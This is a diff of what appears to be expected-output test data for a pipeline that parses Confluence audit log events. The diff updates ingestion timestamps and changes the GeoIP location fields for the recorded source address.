- "ingested": "2021-12-08T15:09:09.045152065Z",
+ "ingested": "2021-12-14T14:34:52.859157144Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"admin\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":172000000},\"version\":\"1.0\"}",
"type": [
"group",
@@ -1647,20 +1545,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1668,7 +1560,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045153752Z",
+ "ingested": "2021-12-14T14:34:52.859157547Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":401000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -1749,20 +1641,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1770,7 +1656,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045155444Z",
+ "ingested": "2021-12-14T14:34:52.859157911Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":429000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -1845,20 +1731,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1866,7 +1746,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045157120Z",
+ "ingested": "2021-12-14T14:34:52.859158267Z",
"original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":437000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -1947,20 +1827,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1968,7 +1842,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045158823Z",
+ "ingested": "2021-12-14T14:34:52.859158629Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":442000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2049,20 +1923,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2070,7 +1938,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045160526Z",
+ "ingested": "2021-12-14T14:34:52.859158980Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":445000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2145,20 +2013,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2166,7 +2028,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045162214Z",
+ "ingested": "2021-12-14T14:34:52.859159340Z",
"original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":447000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2247,20 +2109,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2268,7 +2124,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045163967Z",
+ "ingested": "2021-12-14T14:34:52.859159817Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":450000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2349,20 +2205,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2370,7 +2220,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045165677Z",
+ "ingested": "2021-12-14T14:34:52.859160211Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":454000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2445,20 +2295,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2466,7 +2310,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045167343Z",
+ "ingested": "2021-12-14T14:34:52.859160565Z",
"original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":457000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2547,20 +2391,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2568,7 +2406,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045169052Z",
+ "ingested": "2021-12-14T14:34:52.859160954Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":459000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2649,20 +2487,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2670,7 +2502,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045170741Z",
+ "ingested": "2021-12-14T14:34:52.859161494Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":462000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2745,20 +2577,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2766,7 +2592,7 @@
},
"event": {
"action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:09:09.045172425Z",
+ "ingested": "2021-12-14T14:34:52.859161854Z",
"original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":464000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -2847,20 +2673,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -2868,7 +2688,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045174116Z", + "ingested": "2021-12-14T14:34:52.859162216Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":467000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2949,20 +2769,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2970,7 +2784,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045175839Z", + "ingested": "2021-12-14T14:34:52.859162581Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":470000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3051,20 +2865,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3072,7 +2880,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045177522Z", + "ingested": "2021-12-14T14:34:52.859162940Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":472000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3147,20 +2955,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3168,7 +2970,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045179208Z", + "ingested": "2021-12-14T14:34:52.859163319Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":475000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3249,20 +3051,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
